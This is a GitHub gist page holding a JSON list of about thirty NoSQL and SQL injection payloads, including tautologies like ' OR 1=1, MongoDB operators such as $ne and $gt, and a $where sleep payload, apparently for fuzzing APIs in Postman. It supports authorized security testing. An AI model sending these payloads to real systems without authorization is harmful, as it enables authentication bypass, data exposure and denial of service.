Skip to content

Instantly share code, notes, and snippets.

@DanaEpp
Created September 20, 2022 22:18
  • Star 3 You must be signed in to star a gist
  • Fork 4 You must be signed in to fork a gist
Star You must be signed in to star a gist
Embed
What would you like to do?
NoSQL injection payloads for Postman
[
{"payload":"'"},
{"payload":"''"},
{"payload":";%00"},
{"payload":"--"},
{"payload":"-- -"},
{"payload":"\"\""},
{"payload":";"},
{"payload":"' OR '1"},
{"payload":"' OR 1 -- -"},
{"payload":"\" OR \"\" = \""},
{"payload":"\" OR 1 = 1 -- -"},
{"payload":"' OR '' = '"},
{"payload":"OR 1=1"},
{"payload":"$gt"},
{"payload":"{\"$gt\":\"\"}"},
{"payload":"{\"$gt\":-1}"},
{"payload":"$ne"},
{"payload":"{\"$ne\":\"\"}"},
{"payload":"{\"$ne\":-1}"},
{"payload":"$nin"},
{"payload":"{\"$nin\":1}"},
{"payload":"{\"$nin\":[1]}"},
{"payload":"|| '1'=='1"},
{"payload":"//"},
{"payload":"||'a'\\'a"},
{"payload":"'||'1'=='1';//"},
{"payload":"'/{}:"},
{"payload":"'\"\\;{}"},
{"payload":"'\"\/$[].>"},
{"payload":"{\"$where\": \"sleep(1000)\"}"}
]
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment